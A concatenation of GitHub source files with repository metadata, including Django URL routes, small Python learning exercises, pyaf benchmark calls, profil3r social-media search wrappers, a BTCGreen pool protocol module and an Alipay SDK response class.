        Specifies login mode for the user. The default value for VirtualMachineConfiguration pools is interactive mode and for CloudServiceConfiguration pools is batch mode.
        """
        return pulumi.get(self, "login_mode")
| [
"noreply@github.com"
] | morrell.noreply@github.com |
13b03308cf7b6535f6bf15ad2090240da75658b2 | bfee360e228494749ce1f73f7bc48cf5f4698d3a | /excelplay_echo/core/urls.py | 25ee96a89465e3093bf6586026db47af2fb93213 | [] | no_license | Excel-MEC/excelplay-echo | 0cc1f8d2305c107f95c8e72f7929651ec44c2b0f | 2b062e2a783adb7abeb05420c0761734fa1d368f | refs/heads/master | 2021-04-18T21:26:59.333703 | 2019-01-14T17:34:54 | 2019-01-14T17:34:54 | 126,799,930 | 1 | 1 | null | 2018-10-26T09:13:41 | 2018-03-26T08:47:40 | Python | UTF-8 | Python | false | false | 321 | py | from django.urls import path
from core.views import Submissionform,Problem,handshake

# URL routes for this app; the leaderboard route is kept commented out.
urlpatterns =[
    # path('leaderboard',Echoleaderboard.as_view(),name='leaderboard'),
    path('submit',Submissionform,name='finalsubmit'),
    path('probs',Problem,name='Problems'),
    path('handshake',handshake,name='handshake')
]
| [
"kurian.pro@gmail.com"
] | kurian.pro@gmail.com |
859ec81a3750696e6e42c17160e3397d0d0753fb | accdde552cda99d0fa328441bebdc7ce78b74f36 | /venv/Session6I.py | 4f258afe71ea77a573b36943755b33675423d95e | [] | no_license | navnoorsingh13/GW2019PA2 | 056f0b3d293d8a6f3ec149c8de01c96f0d46f826 | b94b2a5e1c6a760a5ada87e3f7a3117da552387d | refs/heads/master | 2022-01-17T13:20:57.446539 | 2019-07-19T10:53:37 | 2019-07-19T10:53:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 237 | py | # Pass By Reference
def squareOfNumbers(nums):
    """Replace every element of *nums* with its square, mutating the list
    in place (the caller sees the change — lists are passed by reference)."""
    for index, value in enumerate(nums):
        nums[index] = value * value
# Demonstration: the list object is shared, so the caller's list is squared in place.
numbers = [1, 2, 3, 4, 5]
squareOfNumbers(numbers)
print(numbers)  # prints the mutated list [1, 4, 9, 16, 25]
def fun(a, b, c):
    """Placeholder used to demonstrate keyword arguments."""
    pass
# Keyword arguments may be passed in any order.
fun(a=10, c=20, b=30)
"er.ishant@gmail.com"
] | er.ishant@gmail.com |
ccd38499deb46018021dc170d1176876dd50b27e | 9f3488ddfdb02165f1be9a3ce3a4a3468af0e793 | /leetcode/273.integer-to-english-words.py | ca6936b235ba2fbf36945ffa81071a42077ea446 | [] | no_license | szr22/algorithm | b76646799272b81ea6dd179f0d07dba64d9b10d2 | bcf18a6583303dbd5a10776d2c70181b0733defb | refs/heads/master | 2022-05-13T13:59:27.471727 | 2022-04-15T18:27:55 | 2022-04-15T18:27:55 | 190,107,858 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,709 | py | #
# @lc app=leetcode id=273 lang=python3
#
# [273] Integer to English Words
#
# @lc code=start
class Solution:
    """LeetCode 273: spell out a non-negative integer (< 2**31) in English words."""

    def __init__(self):
        # Words for 0..19; index 0 is empty ("Zero" is special-cased in numberToWords).
        self.dictLessTwenty = ["", "One", "Two", "Three", "Four", "Five", "Six", "Seven", "Eight", "Nine", "Ten", "Eleven", "Twelve", "Thirteen", "Fourteen", "Fifteen", "Sixteen", "Seventeen", "Eighteen", "Nineteen"]
        # Words for the tens digit (20, 30, ..., 90); the first two slots are unused.
        self.dictTens = ["", "", "Twenty", "Thirty", "Forty", "Fifty", "Sixty", "Seventy", "Eighty", "Ninety"]
        # Scale word for each successive three-digit group above the lowest one.
        self.dictMoreHundred = ["Thousand", "Million", "Billion"]

    def numberToWords(self, num: int) -> str:
        """Return *num* written out in English words ("Zero" for 0)."""
        # Spell the lowest three digits, then prepend each higher non-zero
        # group together with its scale word.
        res = self.numberToHundred(num % 1000)
        for i in range(3):
            num //= 1000
            # Skip all-zero groups so no bare scale word is emitted.
            # (The original code had a no-op bare `res` statement here.)
            if num % 1000 != 0:
                res = self.numberToHundred(num % 1000) + ' ' + self.dictMoreHundred[i] + ' ' + res
        # Empty lower groups leave trailing spaces behind; trim them.
        res = res.rstrip()
        return res if res else 'Zero'

    def numberToHundred(self, num: int) -> str:
        """Spell a value in [0, 999]; returns the empty string for 0."""
        hundredNum = num // 100
        hundredRemainderNum = num % 100
        tenRemainderNum = num % 10
        if hundredRemainderNum < 20:
            # 0..19 have irregular names, handled by direct lookup.
            res = self.dictLessTwenty[hundredRemainderNum]
        else:
            res = self.dictTens[hundredRemainderNum // 10]
            if tenRemainderNum > 0:
                res += ' ' + self.dictLessTwenty[tenRemainderNum]
        if hundredNum > 0:
            if hundredRemainderNum > 0:
                res = ' ' + res
            res = self.dictLessTwenty[hundredNum] + ' Hundred' + res
        return res
# @lc code=end
# Ad-hoc manual check; the first assignment is immediately overwritten,
# so only 1051 is actually exercised.
num = 1234567891
num = 1051
res = Solution().numberToWords(num)
print(res)
"shizhenrong1987@hotmail.com"
] | shizhenrong1987@hotmail.com |
e889548a187ca2c0ffa106a9c7a66ec640690c87 | ab8a1749aa2b1ad5f5d6fde4ad83702b306c9946 | /bowler/_bowlerv3.py | 1feb828fe6c62dbfc524677718fea104647aa980 | [] | no_license | Auzzy/python-dyio | ae85fdf5cdf17c59f6923e0a7c3eccd97bdddc3a | 60ccc8b311ff23f897b102524fd5ebdf847a4b3a | refs/heads/master | 2016-09-01T09:26:24.517331 | 2013-03-10T21:36:29 | 2013-03-10T21:36:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,452 | py | from bowler import _DatagramBuilder,_DatagramParser
# Size in bytes of a Bowler v3 header: 1 version + 6 MAC + 1 affect
# + 1 ns/direction + 1 payload length + 1 checksum (see _Builder._build_header).
LENGTH = 11
class Affect(object):
    """Constants for the Bowler v3 packet 'affect' byte
    (see _get_affect/_unpack_affect for the flag mapping)."""
    STATUS = 0x00
    GET = 0x10
    POST = 0x20
    CRIT = 0x30
    ASYNC = 0x40
class _Builder(_DatagramBuilder):
    """Assembles outgoing Bowler v3 datagrams (header + payload)."""
    @staticmethod
    def build(mac, func, args, affect, ns):
        """Build a complete datagram for `func(args)` addressed to `mac`.

        `mac` is a colon-separated hex string; colons are replaced with spaces
        so bytearray.fromhex() can parse it in _build_header.
        """
        mac = mac.replace(':',' ')
        payload = _Builder._build_payload(func,args)
        header = _Builder._build_header(mac,affect,ns,len(payload))
        return header + payload
    @staticmethod
    def _build_header(mac, affect, ns, payload_size):
        # Header layout: version (0x3), 6-byte MAC, affect byte,
        # (ns << 1) | direction-bit, payload length, then a one-byte
        # sum-of-all-previous-bytes checksum (mirrored by _Parser._parse_header).
        header = bytearray()
        header.append(0x3)
        header.extend(bytearray.fromhex(mac))
        header.append(affect)
        header.append((ns << 1) | 0)  # low bit (direction in the parser) forced to 0 outbound
        header.append(payload_size)
        header.append(sum(header) & 0x000000FF)
        return header
    @staticmethod
    def _build_payload(func, args):
        # Left-pad the function id to 4 bytes, then append the encoded args.
        # NOTE(review): bytearray(func, "hex") relies on the Python 2 "hex"
        # codec (this module also uses `async` as an identifier below, so it
        # predates Python 3.7) — verify before porting.
        func_bytes = bytearray(4-len(func)) + bytearray(func,"hex")
        arg_bytes = _Builder.args_to_bytes(args)  # presumably inherited from _DatagramBuilder — confirm
        return func_bytes + arg_bytes
class _Parser(_DatagramParser):
    """Parses incoming Bowler v3 datagrams read from a serial port."""
    @staticmethod
    def parse(port, header):
        """Read and decode the payload for an already-received `header`.

        Returns (name, args, affect, dir); raises if the payload never arrives.
        """
        affect,dir,length = _Parser._parse_header(header)
        func = bytearray(port.read(length))
        if not func:
            # NOTE(review): SerialTimeoutException is not defined in this
            # module's visible code — presumably imported elsewhere; verify.
            raise SerialTimeoutException("A timeout occurred while reading an incoming packet.")
        name,args = _Parser._parse_func(func)
        return name,args,affect,dir
    @staticmethod
    def _parse_header(header):
        # Mirror of _Builder._build_header: unpack fields and validate checksum.
        mac = header[1:7]  # extracted but currently unused
        affect = header[7]
        ns = header[8] >> 1  # also unused beyond extraction
        dir = header[8] & 0x1
        length = header[9]
        checksum = header[10]
        data_checksum = sum(header[:10]) & 0x000000FF
        if checksum!=data_checksum:
            raise IOError("The received data was corrupted.")
        return affect,dir,length
    @staticmethod
    def _parse_func(func):
        # First 4 bytes are the function id, the remainder its argument bytes.
        return func[:4],func[4:]
# NOTE(review): `async` is used as a parameter name, so this file targets
# Python 2 / <=3.6 (`async` became a reserved word in Python 3.7).
def _get_affect(priority, state, async):
    """Collapse (priority, state, async) request flags into one affect code.

    Priority 0 wins over everything; otherwise state beats async beats plain GET.
    """
    if priority==0:
        return Affect.CRIT
    elif state:
        return Affect.POST
    elif async:
        return Affect.ASYNC
    else:
        return Affect.GET
def _unpack_affect(affect):
    """Invert _get_affect: map an affect code back to (priority, state, async)."""
    if affect == Affect.CRIT:
        priority, state, is_async = 0, False, False
    elif affect == Affect.POST:
        priority, state, is_async = 32, True, False
    elif affect == Affect.ASYNC:
        priority, state, is_async = 32, False, True
    else:
        priority, state, is_async = 32, False, False
    return priority, state, is_async
# NOTE(review): args=[] is a shared mutable default — safe only if callees
# never mutate it; `encrypted` is accepted but ignored. `async` as a keyword
# parameter confirms this is pre-Python-3.7 code.
def build(mac, func, args=[], priority=32, state=False, async=False, encrypted=False, ns=0x0):
    """Public entry point: build a v3 datagram for `func(args)` to `mac`."""
    affect = _get_affect(priority,state,async)
    return _Builder.build(mac,func,args,affect,ns)
# RETURN: func, args, priority, state, async, dir, encrypted
def parse(port, header):
    """Public entry point: parse one incoming datagram.

    `encrypted` is always reported as False (v3 does not carry that flag).
    """
    func,args,affect,dir = _Parser.parse(port,header)
    priority,state,async = _unpack_affect(affect)
    return func,args,priority,state,async,dir,False
| [
"metalnut4@netscape.net"
] | metalnut4@netscape.net |
f39f248f0bbe9ef7481745246946d51ff52cf137 | d2c4934325f5ddd567963e7bd2bdc0673f92bc40 | /tests/artificial/transf_Quantization/trend_Lag1Trend/cycle_7/ar_12/test_artificial_32_Quantization_Lag1Trend_7_12_20.py | 8aab6db49f32f6e1b077dd49b45246fcd79cf007 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | jmabry/pyaf | 797acdd585842474ff4ae1d9db5606877252d9b8 | afbc15a851a2445a7824bf255af612dc429265af | refs/heads/master | 2020-03-20T02:14:12.597970 | 2018-12-17T22:08:11 | 2018-12-17T22:08:11 | 137,104,552 | 0 | 0 | BSD-3-Clause | 2018-12-17T22:08:12 | 2018-06-12T17:15:43 | Python | UTF-8 | Python | false | false | 272 | py | import pyaf.Bench.TS_datasets as tsds
import pyaf.tests.artificial.process_artificial_dataset as art

# Benchmark run: 32-point daily series, Lag1Trend trend, cycle length 7,
# Quantization transform, AR order 12, 20 exogenous variables, fixed seed.
art.process_dataset(N = 32 , FREQ = 'D', seed = 0, trendtype = "Lag1Trend", cycle_length = 7, transform = "Quantization", sigma = 0.0, exog_count = 20, ar_order = 12);
"antoine.carme@laposte.net"
] | antoine.carme@laposte.net |
9c5539d8a3f55ac77c8088a89e80ba26627d0880 | 4751fd86184b64316d694a98671d34faae76ffe6 | /plannerrr/urls.py | 5440d164eca08d316b10eec4f88ad184fb5b72d6 | [] | no_license | mohammedaliyu136/dg_planner | 8a6a4888cc109d6c3a1cb115494a1e6decbb864a | a0fb87e182527e541e7758a2c4720ddbb2438145 | refs/heads/master | 2020-04-03T08:09:02.020426 | 2018-10-29T19:57:16 | 2018-10-29T19:57:16 | 155,124,132 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,225 | py | from plannerrr import views
from django.conf.urls import include, url
from django.contrib import admin
from plannerrr.advisor.views import edit_default_plan

# NOTE(review): `include`, `admin` and `edit_default_plan` are imported but not
# referenced in this URLconf — confirm before removing.
# NOTE(review): several routes share a `name=` value (login/login_out -> 'login',
# profile/enroll_profile -> 'profile', team and plan/edit -> 'team'), so
# reverse() will only resolve one of each pair.
urlpatterns = [
    url(r'^$', views.index, name='index'),
    url(r'^login/', views.login_user, name='login'),
    url(r'^login_out/', views.logout_user, name='login'),
    url(r'^profile/', views.profile, name='profile'),
    url(r'^register/', views.register, name='register'),
    url(r'^enroll_profile/', views.enroll_profile, name='profile'),
    url(r'^indexx/', views.indexx, name='get_info'),
    url(r'^degree_req/', views.degree_req, name='free_elective_req'),
    url(r'^my_view/', views.my_view, name='my_view'),
    url(r'^show_schedule/', views.show_schedule, name='planner'),
    url(r'^search/', views.search, name='search'),
    url(r'^student/(?P<pk>\d+)$', views.search_click, name='student'),
    url(r'^students/$', views.search, name='students'),
    url(r'^team/$', views.team, name='team'),
    url(r'^plan/edit/$', views.edit_plan, name='team'),
    url(r'^plan/generated/pdf/$', views.generate_pdf, name='pdf'),
    url(r'^dashboard/', views.dashboard, name='dashboard'),
    url(r'^getcourse/', views.get_course, name='get_course'),
]
| [
"mohammedaliyu136@gmail.com"
] | mohammedaliyu136@gmail.com |
a7116d737ea16e7b0521b8c9990f276ce7f27c42 | d0bdf444c71b724ecfd59b5bc6850962c56494cb | /homeworks/02-arrays_tables/tests/q2_2.py | b338149a2d1c1e8bf6590df93b420ef2042ceb53 | [] | no_license | ucsd-ets/dsc10-su20-public | 10e3d0ff452b337f222baee330fe60d1465b0071 | 38787e6cc3e6210b4cc8a46350e5120845971c9f | refs/heads/master | 2022-12-13T23:28:20.512649 | 2020-09-03T19:28:06 | 2020-09-03T19:28:06 | 275,905,339 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 404 | py | test = {
'name': 'Question 2_2',
'hidden': False,
'points': 1,
'suites': [
{
'cases': [
{
'code': r"""
>>> isinstance( new_allowances_constant , np.ndarray)
True
""",
'hidden': False,
'locked': False
}
],
'scored': True,
'setup': '',
'teardown': '',
'type': 'doctest'
}
]
}
| [
"eldridgejm@gmail.com"
] | eldridgejm@gmail.com |
3c2ffe9176682d22fb8791c366db0d1b969071f8 | f7deae8209a3ff66050780d5e59c8f2231f8139f | /profil3r/app/core/services/_social.py | a5abb6c74a823594b669110e37afced5602f1873 | [
"MIT"
] | permissive | cyber-workforce/Profil3r | 858b6ce3ad71bb4cf5d621a6bd18023d50538968 | ec308924850e0514416aaeaa9e96eabf658e2d0e | refs/heads/main | 2023-06-17T04:07:57.303282 | 2021-07-12T12:51:03 | 2021-07-12T12:51:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,041 | py | from profil3r.app.modules.social.facebook import Facebook
from profil3r.app.modules.social.twitter import Twitter
from profil3r.app.modules.social.tiktok import TikTok
from profil3r.app.modules.social.instagram import Instagram
from profil3r.app.modules.social.pinterest import Pinterest
from profil3r.app.modules.social.linktree import LinkTree
from profil3r.app.modules.social.myspace import MySpace
from profil3r.app.modules.social.flickr import Flickr
from profil3r.app.modules.social.goodread import GoodRead
# Facebook
def facebook(self):
    """Run the Facebook module over the permutation list, store and print results."""
    found = Facebook(self.config, self.permutations_list).search()
    self.result["facebook"] = found
    self.print_results("facebook")
# Twitter
def twitter(self):
    """Run the Twitter module over the permutation list, store and print results."""
    found = Twitter(self.config, self.permutations_list).search()
    self.result["twitter"] = found
    self.print_results("twitter")
# TikTok
def tiktok(self):
    """Run the TikTok module over the permutation list, store and print results."""
    found = TikTok(self.config, self.permutations_list).search()
    self.result["tiktok"] = found
    self.print_results("tiktok")
# Instagram
def instagram(self):
    """Run the Instagram module over the permutation list, store and print results."""
    found = Instagram(self.config, self.permutations_list).search()
    self.result["instagram"] = found
    self.print_results("instagram")
# Pinterest
def pinterest(self):
    """Run the Pinterest module over the permutation list, store and print results."""
    found = Pinterest(self.config, self.permutations_list).search()
    self.result["pinterest"] = found
    self.print_results("pinterest")
# LinkTree
def linktree(self):
    """Run the LinkTree module over the permutation list, store and print results."""
    found = LinkTree(self.config, self.permutations_list).search()
    self.result["linktree"] = found
    self.print_results("linktree")
# MySpace
def myspace(self):
    """Run the MySpace module over the permutation list, store and print results."""
    found = MySpace(self.config, self.permutations_list).search()
    self.result["myspace"] = found
    self.print_results("myspace")
# Flickr
def flickr(self):
    """Run the Flickr module over the permutation list, store and print results."""
    found = Flickr(self.config, self.permutations_list).search()
    self.result["flickr"] = found
    self.print_results("flickr")
# GoodRead
def goodread(self):
    """Run the GoodRead module over the permutation list, store and print results."""
    found = GoodRead(self.config, self.permutations_list).search()
    self.result["goodread"] = found
    self.print_results("goodread")
"r0g3r5@protonmail.com"
] | r0g3r5@protonmail.com |
91b6bd20ba16539afdb282384848c0db31a11601 | 111cac4319ff247d890926ddda4809a7ca6e6f25 | /ch02/02.py | edc962b02e51c769360fa1e35669d95871ace916 | [] | no_license | gebijiaxiaowang/FluentPython | c5c9838209524cbab0036f22ef6b75085b8ead53 | 700427ee872cd4c2a4b6466f7a214b7acc679580 | refs/heads/master | 2023-03-02T21:20:06.224311 | 2021-02-09T08:58:42 | 2021-02-09T08:58:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,162 | py | #!/usr/bin/python3.7
# -*- coding: utf-8 -*-
# @Time : 2020/12/31 15:25
# @Author : dly
# @File : 02.py
# @Desc :
import os
from collections import namedtuple

lax_coordinates = (33.9, -118.4)

# Tuple unpacking
latitude, longitude = lax_coordinates
print(latitude)
print(longitude)

# divmod(x, y)
# Return the tuple (x//y, x%y).
print(divmod(20, 8))

# Split a path into (directory, file name)
print(os.path.split('/home/python/test.py'))
# ('/home/python', 'test.py')

# Use * to capture the remaining items
a, b, *c = range(5)
print(a, b, c)

# Named tuples
City = namedtuple('City', 'name country population coordinates')
# Field names
print(City._fields)
tokyo = City('Tokyo', 'JP', 36.9, (35.6, 239.6))
print(tokyo)
print(tokyo.population)
print(tokyo.coordinates)
# Convert to a dict
print(tokyo._asdict())

# Slice assignment
l = list(range(10))
print(l)
l[2:5] = [20, 30]
print(l)
l[2:5] = [100]
print(l)

# Using + and * with sequences
board = [['_'] * 3 for i in range(3)]
print(board)
board[1][2] = 'x'
print(board)

# Here all three rows are references to the SAME inner list
board = [['_'] * 3] * 3
print(board)
board[1][2] = '0'
print(board)

# += on a mutable item stored inside an immutable tuple
t = (1, 2, [30, 40])
# BUG FIX: `t[2] += [50, 60]` first extends the list in place and THEN raises
# TypeError when the tuple rejects the item re-assignment, so the original
# script crashed here and the final print(t) never ran. Catch the TypeError
# so the demo can show the (nevertheless mutated) tuple.
try:
    t[2] += [50, 60]
except TypeError as exc:
    print('TypeError:', exc)
print(t)
| [
"1083404373@qq.com"
] | 1083404373@qq.com |
ff4a5fc06618705dfc56f7d5407354cef5cb04bd | d943d1b6803bb3c44b3600a2b3728662d4a3de06 | /btcgreen/protocols/pool_protocol.py | 8156b5f25f7f6e48ecf3d376e3bbe60cd68eaabe | [
"Apache-2.0"
] | permissive | onuratakan/btcgreen-blockchain | 624575e3f484dcbb70dbbbfab46f7eeb92a5b709 | 03c9e27c483a0c3e6a34713dd9d2502eff7c25b2 | refs/heads/main | 2023-09-06T04:31:12.725344 | 2021-10-16T23:45:51 | 2021-10-16T23:45:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,027 | py | from dataclasses import dataclass
from enum import Enum
import time
from typing import Optional
from blspy import G1Element, G2Element
from btcgreen.types.blockchain_format.proof_of_space import ProofOfSpace
from btcgreen.types.blockchain_format.sized_bytes import bytes32
from btcgreen.util.ints import uint8, uint16, uint32, uint64
from btcgreen.util.streamable import Streamable, streamable
# Version of the pool protocol implemented by this module.
POOL_PROTOCOL_VERSION = uint8(1)
class PoolErrorCode(Enum):
    """Numeric error codes defined by the pool protocol (see ErrorResponse)."""
    REVERTED_SIGNAGE_POINT = 1
    TOO_LATE = 2
    NOT_FOUND = 3
    INVALID_PROOF = 4
    PROOF_NOT_GOOD_ENOUGH = 5
    INVALID_DIFFICULTY = 6
    INVALID_SIGNATURE = 7
    SERVER_EXCEPTION = 8
    INVALID_P2_SINGLETON_PUZZLE_HASH = 9
    FARMER_NOT_KNOWN = 10
    FARMER_ALREADY_KNOWN = 11
    INVALID_AUTHENTICATION_TOKEN = 12
    INVALID_PAYOUT_INSTRUCTIONS = 13
    INVALID_SINGLETON = 14
    DELAY_TIME_TOO_SHORT = 15
    REQUEST_FAILED = 16
# Used to verify GET /farmer and GET /login
@dataclass(frozen=True)
@streamable
class AuthenticationPayload(Streamable):
    """Payload that gets signed to verify GET /farmer and GET /login requests."""
    method_name: str
    launcher_id: bytes32
    target_puzzle_hash: bytes32
    authentication_token: uint64
# GET /pool_info
@dataclass(frozen=True)
@streamable
class GetPoolInfoResponse(Streamable):
    """Response body for GET /pool_info."""
    name: str
    logo_url: str
    minimum_difficulty: uint64
    relative_lock_height: uint32
    protocol_version: uint8
    fee: str
    description: str
    target_puzzle_hash: bytes32
    authentication_token_timeout: uint8
# POST /partial
@dataclass(frozen=True)
@streamable
class PostPartialPayload(Streamable):
    """Payload portion of a POST /partial request."""
    launcher_id: bytes32
    authentication_token: uint64
    proof_of_space: ProofOfSpace
    sp_hash: bytes32
    end_of_sub_slot: bool
    harvester_id: bytes32
@dataclass(frozen=True)
@streamable
class PostPartialRequest(Streamable):
    """Complete POST /partial request: payload plus its aggregate BLS signature."""
    payload: PostPartialPayload
    aggregate_signature: G2Element
# Response in success case
@dataclass(frozen=True)
@streamable
class PostPartialResponse(Streamable):
    """Success response for POST /partial."""
    new_difficulty: uint64
# GET /farmer
# Response in success case
@dataclass(frozen=True)
@streamable
class GetFarmerResponse(Streamable):
    """Success response for GET /farmer."""
    authentication_public_key: G1Element
    payout_instructions: str
    current_difficulty: uint64
    current_points: uint64
# POST /farmer
@dataclass(frozen=True)
@streamable
class PostFarmerPayload(Streamable):
    """Payload portion of a POST /farmer request."""
    launcher_id: bytes32
    authentication_token: uint64
    authentication_public_key: G1Element
    payout_instructions: str
    suggested_difficulty: Optional[uint64]
@dataclass(frozen=True)
@streamable
class PostFarmerRequest(Streamable):
    """Complete POST /farmer request: payload plus its signature."""
    payload: PostFarmerPayload
    signature: G2Element
# Response in success case
@dataclass(frozen=True)
@streamable
class PostFarmerResponse(Streamable):
    """Success response for POST /farmer."""
    welcome_message: str
# PUT /farmer
@dataclass(frozen=True)
@streamable
class PutFarmerPayload(Streamable):
    """Payload portion of a PUT /farmer request (updatable fields are Optional)."""
    launcher_id: bytes32
    authentication_token: uint64
    authentication_public_key: Optional[G1Element]
    payout_instructions: Optional[str]
    suggested_difficulty: Optional[uint64]
@dataclass(frozen=True)
@streamable
class PutFarmerRequest(Streamable):
    """Complete PUT /farmer request: payload plus its signature."""
    payload: PutFarmerPayload
    signature: G2Element
# Response in success case
@dataclass(frozen=True)
@streamable
class PutFarmerResponse(Streamable):
    """Success response for PUT /farmer (one Optional[bool] per updatable field)."""
    authentication_public_key: Optional[bool]
    payout_instructions: Optional[bool]
    suggested_difficulty: Optional[bool]
# Misc
# Response in error case for all endpoints of the pool protocol
@dataclass(frozen=True)
@streamable
class ErrorResponse(Streamable):
    """Error response shared by all endpoints of the pool protocol."""
    error_code: uint16
    error_message: Optional[str]
# Get the current authentication token according to "Farmer authentication"
# in SPECIFICATION.md.
def get_current_authentication_token(timeout: uint8) -> uint64:
    """Return the token for the current wall-clock time, in *timeout*-minute units."""
    minutes_since_epoch = int(time.time() / 60)
    return uint64(minutes_since_epoch // timeout)
# Validate a given authentication token against our local time.
def validate_authentication_token(token: uint64, timeout: uint8):
    """True iff *token* is within *timeout* units of the token for local time."""
    expected = get_current_authentication_token(timeout)
    return abs(token - expected) <= timeout
| [
"svginsomnia@gmail.com"
] | svginsomnia@gmail.com |
3e95aaa34291786d7b1e43802787d3b150378db0 | 5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d | /alipay/aop/api/response/AlipayCommerceEducateTuitioncodePlanDisburseResponse.py | b68b5df3dd899650dcb85ee7430d2c745ecd58df | [
"Apache-2.0"
] | permissive | alipay/alipay-sdk-python-all | 8bd20882852ffeb70a6e929038bf88ff1d1eff1c | 1fad300587c9e7e099747305ba9077d4cd7afde9 | refs/heads/master | 2023-08-27T21:35:01.778771 | 2023-08-23T07:12:26 | 2023-08-23T07:12:26 | 133,338,689 | 247 | 70 | Apache-2.0 | 2023-04-25T04:54:02 | 2018-05-14T09:40:54 | Python | UTF-8 | Python | false | false | 497 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class AlipayCommerceEducateTuitioncodePlanDisburseResponse(AlipayResponse):
    """Response wrapper for the alipay.commerce.educate.tuitioncode.plan.disburse API."""
    def __init__(self):
        super(AlipayCommerceEducateTuitioncodePlanDisburseResponse, self).__init__()
    def parse_response_content(self, response_content):
        # This response declares no fields of its own, so the dict parsed by the
        # base class is not inspected further; the method implicitly returns
        # None, presumably matching the other generated response classes — confirm.
        response = super(AlipayCommerceEducateTuitioncodePlanDisburseResponse, self).parse_response_content(response_content)
| [
"jiandong.jd@antfin.com"
] | jiandong.jd@antfin.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.